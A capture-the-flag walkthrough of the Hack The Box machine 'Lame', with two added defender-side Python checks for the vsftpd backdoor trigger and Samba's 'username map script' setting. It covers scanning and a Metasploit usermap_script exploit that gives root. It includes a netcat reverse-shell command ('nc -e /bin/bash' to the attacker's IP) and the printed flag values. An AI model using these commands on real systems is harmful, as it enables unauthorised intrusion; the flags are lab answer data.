Lame
- OS: Linux
- Difficulty: Easy
- IP Address: 10.10.10.3
- Release: 14 / 03 / 2017
Port scanning
# Nmap 7.92 scan initiate as: nmap -sC -sV -Pn -o nmap/targeted 10.10.10.3 -p 21,22,139,445,3632
Nmap scan report for 10.10.10.3
Host is up (0.064s latency).
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst:
| STAT:
| FTP server status:
| Connected to 10.10.17.44
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| vsFTPd 2.3.4 - secure, fast, stable
|_End of status
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey:
| 1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
|_ 2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
3632/tcp open distccd distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
|_smb2-time: Protocol negotiation failed (SMB2)
| smb-os-discovery:
| OS: Unix (Samba 3.0.20-Debian)
| Computer name: lame
| NetBIOS computer name:
| Domain name: hackthebox.gr
| FQDN: lame.hackthebox.gr
|_ System time:
|_clock-skew: mean: 2h01m21s, deviation: 2h49m45s, median: 1m18s
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done -- 1 IP address (1 host up) scanned in 52.51 seconds
This machine has ports 21 (FTP), 22 (SSH), 139 and 445 (SMB) and 3632 (distccd) open.
FTP enumeration
As stated by nmap, we can access FTP with anonymous credentials:
$ ftp 10.10.10.3
Connected to 10.10.10.3.
220 (vsFTPd 2.3.4)
Name (10.10.10.3:rocky): anonymous
331 Please specify the password.
Password:
230 Login successful.
ftp> dir
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
226 Directory send OK.
But there’s nothing inside.
We can search for exploits for this version of the FTP service (vsftpd 2.3.4) with searchsploit:
$ searchsploit vsftp 2.3.4
------------------------------------------------------- ----------------------
Exploit Title | Path
------------------------------------------------------- ----------------------
vsftpd 2.3.4 - Backdoor Command Execution | unix/remote/49757.py
vsftpd 2.3.4 - Backdoor Command Execution (Metasploit) | unix/remote/17491.rb
------------------------------------------------------- ----------------------
Shellcodes: No Results
Alright, it seems that we can get Remote Code Execution (RCE) for this version (CVE-2011-2523). If we inspect the exploit source code, it seems that the backdoor is triggered by a username containing the sequence :) (the exploit uses nergal:)) and opens a bind shell on port 6200. However, it is not exploitable here.
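A defender-side check for the backdoor described above, added here and not taken from this writeup: it scans vsftpd's own protocol log (the log_ftp_protocol=YES layout) for USER commands carrying the :) trigger sequence and counts the anonymous logins nmap also reported. The log lines, client address, PIDs and timestamps are constructed for the example.

```python
import re
from dataclasses import dataclass

# Constructed sample in the layout of vsftpd's protocol log (log_ftp_protocol=YES).
# Client address, PIDs and timestamps are made up for this example.
SAMPLE_LOG = """\
Sun Jul 17 18:20:01 2022 [pid 2101] CONNECT: Client "10.10.17.44"
Sun Jul 17 18:20:02 2022 [pid 2101] FTP command: Client "10.10.17.44", "USER anonymous"
Sun Jul 17 18:20:02 2022 [pid 2101] [anonymous] OK LOGIN: Client "10.10.17.44", anon password "?"
Sun Jul 17 18:21:40 2022 [pid 2102] CONNECT: Client "10.10.17.44"
Sun Jul 17 18:21:41 2022 [pid 2102] FTP command: Client "10.10.17.44", "USER nergal:)"
Sun Jul 17 18:21:41 2022 [pid 2102] FTP command: Client "10.10.17.44", "PASS <password>"
Sun Jul 17 18:22:05 2022 [pid 2103] FTP command: Client "10.10.17.44", "USER smile:)face"
"""

# One USER command per line. The backdoored vsftpd 2.3.4 looked for the two
# bytes 0x3a 0x29 (":)") anywhere in the username, not only at its end.
USER_CMD = re.compile(
    r'\[pid (?P<pid>\d+)\] FTP command: Client "(?P<client>[^"]+)", "USER (?P<user>[^"]*)"'
)
TRIGGER = ":)"

@dataclass(frozen=True)
class Finding:
    pid: int
    client: str
    user: str

def detect_backdoor_trigger(log_text: str) -> list:
    """Return one Finding per USER command whose username contains the trigger."""
    findings = []
    for line in log_text.splitlines():
        m = USER_CMD.search(line)
        if m and TRIGGER in m.group("user"):
            findings.append(Finding(int(m.group("pid")), m.group("client"), m.group("user")))
    return findings

def anonymous_logins(log_text: str) -> int:
    """Count successful anonymous logins, the other weakness nmap reported for this host."""
    return sum(1 for line in log_text.splitlines() if "[anonymous] OK LOGIN" in line)

if __name__ == "__main__":
    for f in detect_backdoor_trigger(SAMPLE_LOG):
        print(f"pid {f.pid}: client {f.client} sent USER {f.user!r} (CVE-2011-2523 trigger)")
    print(f"anonymous logins: {anonymous_logins(SAMPLE_LOG)}")
```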
SMB enumeration
Let’s search for exploits for Samba 3.0.20 in searchsploit:
$ searchsploit Samba 3.0.20
--------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
--------------------------------------------------------------------------------- ---------------------------------
Samba 3.0.10 < 3.3.5 - Format String / Security Bypass | multiple/remote/10095.txt
Samba 3.0.20 < 3.0.25rc3 - 'Username' map script' Command Execution (Metasploit) | unix/remote/16320.rb
Samba < 3.0.20 - Remote Heap Overflow | linux/remote/7701.txt
Samba < 3.0.20 - Remote Heap Overflow | linux/remote/7701.txt
Samba < 3.6.2 (x86) - Denial of Service (PoC) | linux_x86/dos/36741.py
-------------------------------------------------------------------------------------------------------------------
Shellcodes: No Results
Alright, there is one that provides RCE: the 'Username map script' command execution entry.
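The setting that the usermap_script entry abuses is a Samba configuration choice, so a defender can audit for it directly. The following is an added example, not code from this writeup or from the Samba project: it parses an smb.conf, flags 'username map script' together with the signing and guest settings nmap reported on this host, and shows a hardened counterpart; both configuration fragments and the script path are constructed.

```python
import re
# Constructed smb.conf fragments (not the machine's real file): a weak shape and a hardened counterpart.
WEAK_SMB_CONF = """\
[global]
    workgroup = WORKGROUP
    # Samba 3.0.20 - 3.0.25rc3 hand the client-supplied username to this script through a shell
    username map script = /etc/samba/scripts/mapusers.sh
[tmp]
    path = /tmp
    guest ok = yes
"""
HARDENED_SMB_CONF = """\
[global]
    workgroup = WORKGROUP
    username map = /etc/samba/smbusers
    server signing = mandatory
[tmp]
    path = /tmp
    guest ok = no
"""

def parse_smb_conf(text):
    """Minimal section-aware parser: {section: {key: value}}, keys lower-cased."""
    sections, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] in "#;": continue   # smb.conf comments are whole lines
        m = re.fullmatch(r"\[(.+)\]", line)
        if m:
            current = m.group(1).strip().lower()
            sections.setdefault(current, {})
        elif "=" in line and current is not None:
            key, value = line.split("=", 1)
            sections[current][key.strip().lower()] = value.strip()
    return sections

def audit_smb_conf(text):
    """Return (severity, message) pairs for the weaknesses relevant to this host."""
    conf = parse_smb_conf(text)
    g = conf.get("global", {})
    findings = []
    if "username map script" in g:   # the setting the usermap_script module abuses
        findings.append(("high", f"username map script = {g['username map script']}; use a static 'username map' file instead"))
    if g.get("server signing", "").lower() != "mandatory":
        findings.append(("medium", "server signing is not mandatory (nmap: message_signing disabled)"))
    for name, share in conf.items():
        if name != "global" and share.get("guest ok", "no").lower() == "yes":
            findings.append(("low", f"share [{name}] allows guest access"))
    return findings
```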
Foothold on the machine
Let’s use Metasploit for this purpose:
# msfconsole -q
msf6 > search Samba 3.0.20
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/multi/samba/usermap_script 2007-05-14 excellent No Samba "username map script" Command Execution
Interact with a module by name or index. For example info 0, use 0 or use exploit/multi/samba/usermap_script
msf6 > use exploit/multi/samba/usermap_script
[*] No payload configured, defaulting to cmd/unix/reverse_netcat
msf6 exploit(multi/samba/usermap_script) > show options
Module options (exploit/multi/samba/usermap_script):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
RPORT 139 yes The target port (TCP)
Payload options (cmd/unix/reverse_netcat):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 192.168.1.100 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic
msf6 exploit(multi/samba/usermap_script) > set RHOSTS 10.10.10.3
RHOSTS => 10.10.10.3
msf6 exploit(multi/samba/usermap_script) > set LHOST 10.10.17.44
LHOST => 10.10.17.44
msf6 exploit(multi/samba/usermap_script) > exploit
[*] Started reverse TCP handler on 10.10.17.44:4444
[*] Command shell session 1 opened (10.10.17.44:4444 -> 10.10.10.3:40626) at 2022-07-17 18:24:10 +0200
which nc
/bin/nc
nc -e /bin/bash 10.10.17.44 5555
I decided to run a second reverse shell to get a full TTY in nc:
$ nc -nlvp 5555
Ncat: Version 7.92 ( https://nmap.org/ncat )
Ncat: Listening on :::5555
Ncat: Listening on 0.0.0.0:5555
Ncat: Connection from 10.10.10.3.
Ncat: Connection from 10.10.10.3:54564.
script /dev/null -c bash
root@lame:/# ^Z
zsh: suspended ncat -nlvp 5555
$ stty raw -echo; fg
[1] + continued ncat -nlvp 5555
Erase set to delete.
Kill set to control-U (^U).
Interrupt set to control-C (^C).
root@lame:/# export TERM=xterm
root@lame:/# export SHELL=bash
root@lame:/# stty rows 50 columns 158
Privilege escalation
We are already root, because the injected command runs with the privileges of the smbd process, so at this point we only have to capture both flags:
root@lame:/# ls /home
ftp makis service user
root@lame:/# find /home -name user.txt
/home/makis/user.txt
root@lame:/# cat /home/makis/user.txt
56c5a638db443c0dd212990228c55aec
root@lame:/# cat /root/root.txt
490c7ed2a8c6e7a72d719d478938accc